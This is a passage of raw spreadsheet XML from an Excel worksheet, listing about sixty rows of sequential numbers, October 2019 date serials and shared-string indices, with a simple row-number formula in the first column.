        <f t="shared" si="98"/>
        <v>6292</v>
      </c>
      <c r="B6293">
        <v>1292</v>
      </c>
      <c r="C6293" t="s">
        <v>9973</v>
      </c>
      <c r="D6293" s="1">
        <v>43751</v>
      </c>
      <c r="E6293" t="s">
        <v>12446</v>
      </c>
      <c r="F6293" t="s">
        <v>9975</v>
      </c>
      <c r="G6293" t="s">
        <v>12447</v>
      </c>
    </row>
    <row r="6294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6294">
        <f t="shared" si="98"/>
        <v>6293</v>
      </c>
      <c r="B6294">
        <v>1293</v>
      </c>
      <c r="C6294" t="s">
        <v>9973</v>
      </c>
      <c r="D6294" s="1">
        <v>43754</v>
      </c>
      <c r="E6294" t="s">
        <v>12448</v>
      </c>
      <c r="F6294" t="s">
        <v>9975</v>
      </c>
      <c r="G6294" t="s">
        <v>12449</v>
      </c>
    </row>
    <row r="6295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6295">
        <f t="shared" si="98"/>
        <v>6294</v>
      </c>
      <c r="B6295">
        <v>1294</v>
      </c>
      <c r="C6295" t="s">
        <v>9973</v>
      </c>
      <c r="D6295" s="1">
        <v>43755</v>
      </c>
      <c r="E6295" t="s">
        <v>12450</v>
      </c>
      <c r="F6295" t="s">
        <v>10021</v>
      </c>
      <c r="G6295" t="s">
        <v>12451</v>
      </c>
    </row>
    <row r="6296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6296">
        <f t="shared" si="98"/>
        <v>6295</v>
      </c>
      <c r="B6296">
        <v>1295</v>
      </c>
      <c r="C6296" t="s">
        <v>9973</v>
      </c>
      <c r="D6296" s="1">
        <v>43746</v>
      </c>
      <c r="E6296" t="s">
        <v>12452</v>
      </c>
      <c r="F6296" t="s">
        <v>9975</v>
      </c>
      <c r="G6296" t="s">
        <v>12453</v>
      </c>
    </row>
    <row r="6297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6297">
        <f t="shared" si="98"/>
        <v>6296</v>
      </c>
      <c r="B6297">
        <v>1296</v>
      </c>
      <c r="C6297" t="s">
        <v>9973</v>
      </c>
      <c r="D6297" s="1">
        <v>43742</v>
      </c>
      <c r="E6297" t="s">
        <v>12454</v>
      </c>
      <c r="F6297" t="s">
        <v>9975</v>
      </c>
      <c r="G6297" t="s">
        <v>12455</v>
      </c>
    </row>
    <row r="6298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6298">
        <f t="shared" si="98"/>
        <v>6297</v>
      </c>
      <c r="B6298">
        <v>1297</v>
      </c>
      <c r="C6298" t="s">
        <v>9973</v>
      </c>
      <c r="D6298" s="1">
        <v>43746</v>
      </c>
      <c r="E6298" t="s">
        <v>12456</v>
      </c>
      <c r="F6298" t="s">
        <v>9975</v>
      </c>
      <c r="G6298" t="s">
        <v>12457</v>
      </c>
    </row>
    <row r="6299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6299">
        <f t="shared" si="98"/>
        <v>6298</v>
      </c>
      <c r="B6299">
        <v>1298</v>
      </c>
      <c r="C6299" t="s">
        <v>9973</v>
      </c>
      <c r="D6299" s="1">
        <v>43740</v>
      </c>
      <c r="E6299" t="s">
        <v>12458</v>
      </c>
      <c r="F6299" t="s">
        <v>9975</v>
      </c>
      <c r="G6299" t="s">
        <v>12459</v>
      </c>
    </row>
    <row r="6300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6300">
        <f t="shared" si="98"/>
        <v>6299</v>
      </c>
      <c r="B6300">
        <v>1299</v>
      </c>
      <c r="C6300" t="s">
        <v>9973</v>
      </c>
      <c r="D6300" s="1">
        <v>43740</v>
      </c>
      <c r="E6300" t="s">
        <v>12460</v>
      </c>
      <c r="F6300" t="s">
        <v>9975</v>
      </c>
      <c r="G6300" t="s">
        <v>12461</v>
      </c>
    </row>
    <row r="6301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6301">
        <f t="shared" si="98"/>
        <v>6300</v>
      </c>
      <c r="B6301">
        <v>1300</v>
      </c>
      <c r="C6301" t="s">
        <v>9973</v>
      </c>
      <c r="D6301" s="1">
        <v>43739</v>
      </c>
      <c r="E6301" t="s">
        <v>10099</v>
      </c>
      <c r="F6301" t="s">
        <v>9975</v>
      </c>
      <c r="G6301" t="s">
        <v>12462</v>
      </c>
    </row>
    <row r="6302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6302">
        <f t="shared" si="98"/>
        <v>6301</v>
      </c>
      <c r="B6302">
        <v>1301</v>
      </c>
      <c r="C6302" t="s">
        <v>9973</v>
      </c>
      <c r="D6302" s="1">
        <v>43742</v>
      </c>
      <c r="E6302" t="s">
        <v>12463</v>
      </c>
      <c r="F6302" t="s">
        <v>9975</v>
      </c>
      <c r="G6302" t="s">
        <v>12464</v>
      </c>
    </row>
    <row r="6303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6303">
        <f t="shared" si="98"/>
        <v>6302</v>
      </c>
      <c r="B6303">
        <v>1302</v>
      </c>
      <c r="C6303" t="s">
        <v>9973</v>
      </c>
      <c r="D6303" s="1">
        <v>43739</v>
      </c>
      <c r="E6303" t="s">
        <v>10018</v>
      </c>
      <c r="F6303" t="s">
        <v>9975</v>
      </c>
      <c r="G6303" t="s">
        <v>12465</v>
      </c>
    </row>
    <row r="6304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6304">
        <f t="shared" si="98"/>
        <v>6303</v>
      </c>
      <c r="B6304">
        <v>1303</v>
      </c>
      <c r="C6304" t="s">
        <v>9973</v>
      </c>
      <c r="D6304" s="1">
        <v>43742</v>
      </c>
      <c r="E6304" t="s">
        <v>12466</v>
      </c>
      <c r="F6304" t="s">
        <v>9975</v>
      </c>
      <c r="G6304" t="s">
        <v>12467</v>
      </c>
    </row>
    <row r="6305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6305">
        <f t="shared" si="98"/>
        <v>6304</v>
      </c>
      <c r="B6305">
        <v>1304</v>
      </c>
      <c r="C6305" t="s">
        <v>9973</v>
      </c>
      <c r="D6305" s="1">
        <v>43751</v>
      </c>
      <c r="E6305" t="s">
        <v>12468</v>
      </c>
      <c r="F6305" t="s">
        <v>9975</v>
      </c>
      <c r="G6305" t="s">
        <v>12469</v>
      </c>
    </row>
    <row r="6306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6306">
        <f t="shared" si="98"/>
        <v>6305</v>
      </c>
      <c r="B6306">
        <v>1305</v>
      </c>
      <c r="C6306" t="s">
        <v>9973</v>
      </c>
      <c r="D6306" s="1">
        <v>43756</v>
      </c>
      <c r="E6306" t="s">
        <v>12470</v>
      </c>
      <c r="F6306" t="s">
        <v>9975</v>
      </c>
      <c r="G6306" t="s">
        <v>12471</v>
      </c>
    </row>
    <row r="6307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6307">
        <f t="shared" si="98"/>
        <v>6306</v>
      </c>
      <c r="B6307">
        <v>1306</v>
      </c>
      <c r="C6307" t="s">
        <v>9973</v>
      </c>
      <c r="D6307" s="1">
        <v>43741</v>
      </c>
      <c r="E6307" t="s">
        <v>12472</v>
      </c>
      <c r="F6307" t="s">
        <v>9975</v>
      </c>
      <c r="G6307" t="s">
        <v>12473</v>
      </c>
    </row>
    <row r="6308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6308">
        <f t="shared" si="98"/>
        <v>6307</v>
      </c>
      <c r="B6308">
        <v>1307</v>
      </c>
      <c r="C6308" t="s">
        <v>9973</v>
      </c>
      <c r="D6308" s="1">
        <v>43745</v>
      </c>
      <c r="E6308" t="s">
        <v>12474</v>
      </c>
      <c r="F6308" t="s">
        <v>9975</v>
      </c>
      <c r="G6308" t="s">
        <v>12475</v>
      </c>
    </row>
    <row r="6309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6309">
        <f t="shared" si="98"/>
        <v>6308</v>
      </c>
      <c r="B6309">
        <v>1308</v>
      </c>
      <c r="C6309" t="s">
        <v>9973</v>
      </c>
      <c r="D6309" s="1">
        <v>43744</v>
      </c>
      <c r="E6309" t="s">
        <v>12476</v>
      </c>
      <c r="F6309" t="s">
        <v>9975</v>
      </c>
      <c r="G6309" t="s">
        <v>12477</v>
      </c>
    </row>
    <row r="6310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6310">
        <f t="shared" si="98"/>
        <v>6309</v>
      </c>
      <c r="B6310">
        <v>1309</v>
      </c>
      <c r="C6310" t="s">
        <v>9973</v>
      </c>
      <c r="D6310" s="1">
        <v>43755</v>
      </c>
      <c r="E6310" t="s">
        <v>12478</v>
      </c>
      <c r="F6310" t="s">
        <v>9975</v>
      </c>
      <c r="G6310" t="s">
        <v>12479</v>
      </c>
    </row>
    <row r="6311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6311">
        <f t="shared" si="98"/>
        <v>6310</v>
      </c>
      <c r="B6311">
        <v>1310</v>
      </c>
      <c r="C6311" t="s">
        <v>9973</v>
      </c>
      <c r="D6311" s="1">
        <v>43756</v>
      </c>
      <c r="E6311" t="s">
        <v>12480</v>
      </c>
      <c r="F6311" t="s">
        <v>9975</v>
      </c>
      <c r="G6311" t="s">
        <v>12481</v>
      </c>
    </row>
    <row r="6312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6312">
        <f t="shared" si="98"/>
        <v>6311</v>
      </c>
      <c r="B6312">
        <v>1311</v>
      </c>
      <c r="C6312" t="s">
        <v>9973</v>
      </c>
      <c r="D6312" s="1">
        <v>43754</v>
      </c>
      <c r="E6312" t="s">
        <v>12482</v>
      </c>
      <c r="F6312" t="s">
        <v>9975</v>
      </c>
      <c r="G6312" t="s">
        <v>12483</v>
      </c>
    </row>
    <row r="6313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6313">
        <f t="shared" si="98"/>
        <v>6312</v>
      </c>
      <c r="B6313">
        <v>1312</v>
      </c>
      <c r="C6313" t="s">
        <v>9973</v>
      </c>
      <c r="D6313" s="1">
        <v>43744</v>
      </c>
      <c r="E6313" t="s">
        <v>12484</v>
      </c>
      <c r="F6313" t="s">
        <v>9975</v>
      </c>
      <c r="G6313" t="s">
        <v>12485</v>
      </c>
    </row>
    <row r="6314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6314">
        <f t="shared" si="98"/>
        <v>6313</v>
      </c>
      <c r="B6314">
        <v>1313</v>
      </c>
      <c r="C6314" t="s">
        <v>9973</v>
      </c>
      <c r="D6314" s="1">
        <v>43747</v>
      </c>
      <c r="E6314" t="s">
        <v>12486</v>
      </c>
      <c r="F6314" t="s">
        <v>9975</v>
      </c>
      <c r="G6314" t="s">
        <v>12487</v>
      </c>
    </row>
    <row r="6315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6315">
        <f t="shared" si="98"/>
        <v>6314</v>
      </c>
      <c r="B6315">
        <v>1314</v>
      </c>
      <c r="C6315" t="s">
        <v>9973</v>
      </c>
      <c r="D6315" s="1">
        <v>43754</v>
      </c>
      <c r="E6315" t="s">
        <v>12488</v>
      </c>
      <c r="F6315" t="s">
        <v>9975</v>
      </c>
      <c r="G6315" t="s">
        <v>12489</v>
      </c>
    </row>
    <row r="6316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6316">
        <f t="shared" si="98"/>
        <v>6315</v>
      </c>
      <c r="B6316">
        <v>1315</v>
      </c>
      <c r="C6316" t="s">
        <v>9973</v>
      </c>
      <c r="D6316" s="1">
        <v>43750</v>
      </c>
      <c r="E6316" t="s">
        <v>12490</v>
      </c>
      <c r="F6316" t="s">
        <v>9975</v>
      </c>
      <c r="G6316" t="s">
        <v>12491</v>
      </c>
    </row>
    <row r="6317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6317">
        <f t="shared" si="98"/>
        <v>6316</v>
      </c>
      <c r="B6317">
        <v>1316</v>
      </c>
      <c r="C6317" t="s">
        <v>9973</v>
      </c>
      <c r="D6317" s="1">
        <v>43750</v>
      </c>
      <c r="E6317" t="s">
        <v>12492</v>
      </c>
      <c r="F6317" t="s">
        <v>9975</v>
      </c>
      <c r="G6317" t="s">
        <v>12493</v>
      </c>
    </row>
    <row r="6318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6318">
        <f t="shared" si="98"/>
        <v>6317</v>
      </c>
      <c r="B6318">
        <v>1317</v>
      </c>
      <c r="C6318" t="s">
        <v>9973</v>
      </c>
      <c r="D6318" s="1">
        <v>43751</v>
      </c>
      <c r="E6318" t="s">
        <v>12494</v>
      </c>
      <c r="F6318" t="s">
        <v>9975</v>
      </c>
      <c r="G6318" t="s">
        <v>12495</v>
      </c>
    </row>
    <row r="6319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6319">
        <f t="shared" si="98"/>
        <v>6318</v>
      </c>
      <c r="B6319">
        <v>1318</v>
      </c>
      <c r="C6319" t="s">
        <v>9973</v>
      </c>
      <c r="D6319" s="1">
        <v>43748</v>
      </c>
      <c r="E6319" t="s">
        <v>10099</v>
      </c>
      <c r="F6319" t="s">
        <v>9975</v>
      </c>
      <c r="G6319" t="s">
        <v>12496</v>
      </c>
    </row>
    <row r="6320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6320">
        <f t="shared" si="98"/>
        <v>6319</v>
      </c>
      <c r="B6320">
        <v>1319</v>
      </c>
      <c r="C6320" t="s">
        <v>9973</v>
      </c>
      <c r="D6320" s="1">
        <v>43754</v>
      </c>
      <c r="E6320" t="s">
        <v>12497</v>
      </c>
      <c r="F6320" t="s">
        <v>9975</v>
      </c>
      <c r="G6320" t="s">
        <v>12498</v>
      </c>
    </row>
    <row r="6321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6321">
        <f t="shared" si="98"/>
        <v>6320</v>
      </c>
      <c r="B6321">
        <v>1320</v>
      </c>
      <c r="C6321" t="s">
        <v>9973</v>
      </c>
      <c r="D6321" s="1">
        <v>43753</v>
      </c>
      <c r="E6321" t="s">
        <v>12499</v>
      </c>
      <c r="F6321" t="s">
        <v>9975</v>
      </c>
      <c r="G6321" t="s">
        <v>12500</v>
      </c>
    </row>
    <row r="6322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6322">
        <f t="shared" si="98"/>
        <v>6321</v>
      </c>
      <c r="B6322">
        <v>1321</v>
      </c>
      <c r="C6322" t="s">
        <v>9973</v>
      </c>
      <c r="D6322" s="1">
        <v>43739</v>
      </c>
      <c r="E6322" t="s">
        <v>12501</v>
      </c>
      <c r="F6322" t="s">
        <v>9975</v>
      </c>
      <c r="G6322" t="s">
        <v>12502</v>
      </c>
    </row>
    <row r="6323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6323">
        <f t="shared" si="98"/>
        <v>6322</v>
      </c>
      <c r="B6323">
        <v>1322</v>
      </c>
      <c r="C6323" t="s">
        <v>9973</v>
      </c>
      <c r="D6323" s="1">
        <v>43739</v>
      </c>
      <c r="E6323" t="s">
        <v>12503</v>
      </c>
      <c r="F6323" t="s">
        <v>9975</v>
      </c>
      <c r="G6323" t="s">
        <v>12504</v>
      </c>
    </row>
    <row r="6324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6324">
        <f t="shared" si="98"/>
        <v>6323</v>
      </c>
      <c r="B6324">
        <v>1323</v>
      </c>
      <c r="C6324" t="s">
        <v>9973</v>
      </c>
      <c r="D6324" s="1">
        <v>43738</v>
      </c>
      <c r="E6324" t="s">
        <v>12505</v>
      </c>
      <c r="F6324" t="s">
        <v>9975</v>
      </c>
      <c r="G6324" t="s">
        <v>12506</v>
      </c>
    </row>
    <row r="6325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6325">
        <f t="shared" si="98"/>
        <v>6324</v>
      </c>
      <c r="B6325">
        <v>1324</v>
      </c>
      <c r="C6325" t="s">
        <v>9973</v>
      </c>
      <c r="D6325" s="1">
        <v>43751</v>
      </c>
      <c r="E6325" t="s">
        <v>12507</v>
      </c>
      <c r="F6325" t="s">
        <v>9975</v>
      </c>
      <c r="G6325" t="s">
        <v>12508</v>
      </c>
    </row>
    <row r="6326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6326">
        <f t="shared" si="98"/>
        <v>6325</v>
      </c>
      <c r="B6326">
        <v>1325</v>
      </c>
      <c r="C6326" t="s">
        <v>9973</v>
      </c>
      <c r="D6326" s="1">
        <v>43749</v>
      </c>
      <c r="E6326" t="s">
        <v>12509</v>
      </c>
      <c r="F6326" t="s">
        <v>9975</v>
      </c>
      <c r="G6326" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="6327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6327">
        <f t="shared" si="98"/>
        <v>6326</v>
      </c>
      <c r="B6327">
        <v>1326</v>
      </c>
      <c r="C6327" t="s">
        <v>9973</v>
      </c>
      <c r="D6327" s="1">
        <v>43757</v>
      </c>
      <c r="E6327" t="s">
        <v>12511</v>
      </c>
      <c r="F6327" t="s">
        <v>9975</v>
      </c>
      <c r="G6327" t="s">
        <v>12512</v>
      </c>
    </row>
    <row r="6328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6328">
        <f t="shared" si="98"/>
        <v>6327</v>
      </c>
      <c r="B6328">
        <v>1327</v>
      </c>
      <c r="C6328" t="s">
        <v>9973</v>
      </c>
      <c r="D6328" s="1">
        <v>43740</v>
      </c>
      <c r="E6328" t="s">
        <v>12513</v>
      </c>
      <c r="F6328" t="s">
        <v>9975</v>
      </c>
      <c r="G6328" t="s">
        <v>12514</v>
      </c>
    </row>
    <row r="6329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6329">
        <f t="shared" si="98"/>
        <v>6328</v>
      </c>
      <c r="B6329">
        <v>1328</v>
      </c>
      <c r="C6329" t="s">
        <v>9973</v>
      </c>
      <c r="D6329" s="1">
        <v>43752</v>
      </c>
      <c r="E6329" t="s">
        <v>12515</v>
      </c>
      <c r="F6329" t="s">
        <v>9975</v>
      </c>
      <c r="G6329" t="s">
        <v>12516</v>
      </c>
    </row>
    <row r="6330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6330">
        <f t="shared" si="98"/>
        <v>6329</v>
      </c>
      <c r="B6330">
        <v>1329</v>
      </c>
      <c r="C6330" t="s">
        <v>9973</v>
      </c>
      <c r="D6330" s="1">
        <v>43746</v>
      </c>
      <c r="E6330" t="s">
        <v>12517</v>
      </c>
      <c r="F6330" t="s">
        <v>9975</v>
      </c>
      <c r="G6330" t="s">
        <v>12518</v>
      </c>
    </row>
    <row r="6331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6331">
        <f t="shared" si="98"/>
        <v>6330</v>
      </c>
      <c r="B6331">
        <v>1330</v>
      </c>
      <c r="C6331" t="s">
        <v>9973</v>
      </c>
      <c r="D6331" s="1">
        <v>43753</v>
      </c>
      <c r="E6331" t="s">
        <v>12519</v>
      </c>
      <c r="F6331" t="s">
        <v>9975</v>
      </c>
      <c r="G6331" t="s">
        <v>12520</v>
      </c>
    </row>
    <row r="6332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6332">
        <f t="shared" si="98"/>
        <v>6331</v>
      </c>
      <c r="B6332">
        <v>1331</v>
      </c>
      <c r="C6332" t="s">
        <v>9973</v>
      </c>
      <c r="D6332" s="1">
        <v>43744</v>
      </c>
      <c r="E6332" t="s">
        <v>12521</v>
      </c>
      <c r="F6332" t="s">
        <v>9975</v>
      </c>
      <c r="G6332" t="s">
        <v>12522</v>
      </c>
    </row>
    <row r="6333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6333">
        <f t="shared" si="98"/>
        <v>6332</v>
      </c>
      <c r="B6333">
        <v>1332</v>
      </c>
      <c r="C6333" t="s">
        <v>9973</v>
      </c>
      <c r="D6333" s="1">
        <v>43742</v>
      </c>
      <c r="E6333" t="s">
        <v>12523</v>
      </c>
      <c r="F6333" t="s">
        <v>9975</v>
      </c>
      <c r="G6333" t="s">
        <v>12524</v>
      </c>
    </row>
    <row r="6334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6334">
        <f t="shared" si="98"/>
        <v>6333</v>
      </c>
      <c r="B6334">
        <v>1333</v>
      </c>
      <c r="C6334" t="s">
        <v>9973</v>
      </c>
      <c r="D6334" s="1">
        <v>43752</v>
      </c>
      <c r="E6334" t="s">
        <v>12525</v>
      </c>
      <c r="F6334" t="s">
        <v>9975</v>
      </c>
      <c r="G6334" t="s">
        <v>12526</v>
      </c>
    </row>
    <row r="6335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6335">
        <f t="shared" si="98"/>
        <v>6334</v>
      </c>
      <c r="B6335">
        <v>1334</v>
      </c>
      <c r="C6335" t="s">
        <v>9973</v>
      </c>
      <c r="D6335" s="1">
        <v>43756</v>
      </c>
      <c r="E6335" t="s">
        <v>12527</v>
      </c>
      <c r="F6335" t="s">
        <v>9975</v>
      </c>
      <c r="G6335" t="s">
        <v>12528</v>
      </c>
    </row>
    <row r="6336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6336">
        <f t="shared" si="98"/>
        <v>6335</v>
      </c>
      <c r="B6336">
        <v>1335</v>
      </c>
      <c r="C6336" t="s">
        <v>9973</v>
      </c>
      <c r="D6336" s="1">
        <v>43748</v>
      </c>
      <c r="E6336" t="s">
        <v>12529</v>
      </c>
      <c r="F6336" t="s">
        <v>9975</v>
      </c>
      <c r="G6336" t="s">
        <v>12530</v>
      </c>
    </row>
    <row r="6337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6337">
        <f t="shared" si="98"/>
        <v>6336</v>
      </c>
      <c r="B6337">
        <v>1336</v>
      </c>
      <c r="C6337" t="s">
        <v>9973</v>
      </c>
      <c r="D6337" s="1">
        <v>43746</v>
      </c>
      <c r="E6337" t="s">
        <v>12531</v>
      </c>
      <c r="F6337" t="s">
        <v>9975</v>
      </c>
      <c r="G6337" t="s">
        <v>12532</v>
      </c>
    </row>
    <row r="6338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6338">
        <f t="shared" si="98"/>
        <v>6337</v>
      </c>
      <c r="B6338">
        <v>1337</v>
      </c>
      <c r="C6338" t="s">
        <v>9973</v>
      </c>
      <c r="D6338" s="1">
        <v>43756</v>
      </c>
      <c r="E6338" t="s">
        <v>12533</v>
      </c>
      <c r="F6338" t="s">
        <v>9975</v>
      </c>
      <c r="G6338" t="s">
        <v>12534</v>
      </c>
    </row>
    <row r="6339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6339">
        <f t="shared" ref="A6339:A6402" si="99">+ROW(A6338)</f>
        <v>6338</v>
      </c>
      <c r="B6339">
        <v>1338</v>
      </c>
      <c r="C6339" t="s">
        <v>9973</v>
      </c>
      <c r="D6339" s="1">
        <v>43745</v>
      </c>
      <c r="E6339" t="s">
        <v>12535</v>
      </c>
      <c r="F6339" t="s">
        <v>9975</v>
      </c>
      <c r="G6339" t="s">
        <v>12536</v>
      </c>
    </row>
    <row r="6340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6340">
        <f t="shared" si="99"/>
        <v>6339</v>
      </c>
      <c r="B6340">
        <v>1339</v>
      </c>
      <c r="C6340" t="s">
        <v>9973</v>
      </c>
      <c r="D6340" s="1">
        <v>43738</v>
      </c>
      <c r="E6340" t="s">
        <v>12537</v>
      </c>
      <c r="F6340" t="s">
        <v>9975</v>
      </c>
      <c r="G6340" t="s">
        <v>12538</v>
      </c>
    </row>
    <row r="6341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6341">
        <f t="shared" si="99"/>
        <v>6340</v>
      </c>
      <c r="B6341">
        <v>1340</v>
      </c>
      <c r="C6341" t="s">
        <v>9973</v>
      </c>
      <c r="D6341" s="1">
        <v>43742</v>
      </c>
      <c r="E6341" t="s">
        <v>12539</v>
      </c>
      <c r="F6341" t="s">
        <v>9975</v>
      </c>
      <c r="G6341" t="s">
        <v>12540</v>
      </c>
    </row>
    <row r="6342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6342">
        <f t="shared" si="99"/>
        <v>6341</v>
      </c>
      <c r="B6342">
        <v>1341</v>
      </c>
      <c r="C6342" t="s">
        <v>9973</v>
      </c>
      <c r="D6342" s="1">
        <v>43745</v>
      </c>
      <c r="E6342" t="s">
        <v>12541</v>
      </c>
      <c r="F6342" t="s">
        <v>9975</v>
      </c>
      <c r="G6342" t="s">
        <v>12542</v>
      </c>
    </row>
    <row r="6343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6343">
        <f t="shared" si="99"/>
        <v>6342</v>
      </c>
      <c r="B6343">
        <v>1342</v>
      </c>
      <c r="C6343" t="s">
        <v>9973</v>
      </c>
      <c r="D6343" s="1">
        <v>43752</v>
      </c>
      <c r="E6343" t="s">
        <v>12543</v>
      </c>
      <c r="F6343" t="s">
        <v>9975</v>
      </c>
      <c r="G6343" t="s">
        <v>12544</v>
      </c>
    </row>
    <row r="6344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6344">
        <f t="shared" si="99"/>
        <v>6343</v>
      </c>
      <c r="B6344">
        <v>1343</v>
      </c>
      <c r="C6344" t="s">
        <v>9973</v>
      </c>
      <c r="D6344" s="1">
        <v>43750</v>
      </c>
      <c r="E6344" t="s">
        <v>12545</v>
      </c>
      <c r="F6344" t="s">
        <v>9975</v>
      </c>
      <c r="G6344" t="s">
        <v>12546</v>
      </c>
    </row>
    <row r="6345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6345">
        <f t="shared" si="99"/>
        <v>6344</v>
      </c>
      <c r="B6345">
        <v>1344</v>
      </c>
      <c r="C6345" t="s">
        <v>9973</v>
      </c>
      <c r="D6345" s="1">
        <v>43744</v>
      </c>
      <c r="E6345" t="s">
        <v>12547</v>
      </c>
      <c r="F6345" t="s">
        <v>9975</v>
      </c>
      <c r="G6345" t="s">
        <v>12548</v>
      </c>
    </row>
    <row r="6346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6346">
        <f t="shared" si="99"/>
        <v>6345</v>
      </c>
      <c r="B6346">
        <v>1345</v>
      </c>
      <c r="C6346" t="s">
        <v>9973</v>
      </c>
      <c r="D6346" s="1">
        <v>43751</v>
      </c>
      <c r="E6346" t="s">
        <v>12549</v>
      </c>
      <c r="F6346" t="s">
        <v>9975</v>
      </c>
      <c r="G6346" t="s">
        <v>12550</v>
      </c>
    </row>
    <row r="6347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6347">
        <f t="shared" si="99"/>
        <v>6346</v>
      </c>
      <c r="B6347">
        <v>1346</v>
      </c>
      <c r="C6347" t="s">
        <v>9973</v>
      </c>
      <c r="D6347" s="1">
        <v>43752</v>
      </c>
      <c r="E6347" t="s">
        <v>12551</v>
      </c>
      <c r="F6347" t="s">
        <v>9975</v>
      </c>
      <c r="G6347" t="s">
        <v>12552</v>
      </c>
    </row>
    <row r="6348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6348">
        <f t="shared" si="99"/>
        <v>6347</v>
      </c>
      <c r="B6348">
        <v>1347</v>
      </c>
      <c r="C6348" t="s">
        <v>9973</v>
      </c>
      <c r="D6348" s="1">
        <v>43746</v>
      </c>
      <c r="E6348" t="s">
        <v>12553</v>
      </c>
      <c r="F6348" t="s">
        <v>9975</v>
      </c>
      <c r="G6348" t="s">
        <v>12554</v>
      </c>
    </row>
    <row r="6349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6349">
        <f t="shared" si="99"/>
        <v>6348</v>
      </c>
      <c r="B6349">
        <v>1348</v>
      </c>
      <c r="C6349" t="s">
        <v>9973</v>
      </c>
      <c r="D6349" s="1">
        <v>43739</v>
      </c>
      <c r="E6349" t="s">
        <v>12555</v>
      </c>
      <c r="F6349" t="s">
        <v>9975</v>
      </c>
      <c r="G6349" t="s">
        <v>12556</v>
      </c>
    </row>
    <row r="6350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6350">
        <f t="shared" si="99"/>
        <v>6349</v>
      </c>
      <c r="B6350">
        <v>1349</v>
      </c>
      <c r="C6350" t="s">
        <v>9973</v>
      </c>
      <c r="D6350" s="1">
        <v>43754</v>
      </c>
      <c r="E6350" t="s">
        <v>12557</v>
      </c>
      <c r="F6350" t="s">
        <v>9975</v>
      </c>
      <c r="G6350" t="s">
        <v>12558</v>
      </c>
    </row>
    <row r="6351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6351">
        <f t="shared" si="99"/>
        <v>6350</v>
      </c>
      <c r="B6351">
        <v>1350</v>
      </c>
      <c r="C6351" t="s">
        <v>9973</v>
      </c>
      <c r="D6351" s="1">
        <v>43739</v>
      </c>
      <c r="E6351" t="s">
        <v>12559</v>
      </c>
      <c r="F6351" t="s">
        <v>9975</v>
      </c>
      <c r="G6351" t="s">
        <v>12560</v>
      </c>
    </row>
    <row r="6352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6352">
        <f t="shared" si="99"/>
        <v>6351</v>
      </c>
      <c r="B6352">
        <v>1351</v>
      </c>
      <c r="C6352" t="s">
        <v>9973</v>
      </c>
      <c r="D6352" s="1">
        <v>43743</v>
      </c>
      <c r="E6352" t="s">
        <v>12561</v>
      </c>
      <c r="F6352" t="s">
        <v>9975</v>
      </c>
      <c r="G6352" t="s">
        <v>12562</v>
      </c>
    </row>
    <row r="6353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6353">
        <f t="shared" si="99"/>
        <v>6352</v>
      </c>
      <c r="B6353">
        <v>1352</v>
      </c>
      <c r="C6353" t="s">
        <v>9973</v>
      </c>
      <c r="D6353" s="1">
        <v>43748</v>
      </c>
      <c r="E6353" t="s">
        <v>12563</v>
      </c>
      <c r="F6353" t="s">
        <v>9975</v>
      </c>
      <c r="G6353" t="s">
        <v>12564</v>
      </c>
    </row>
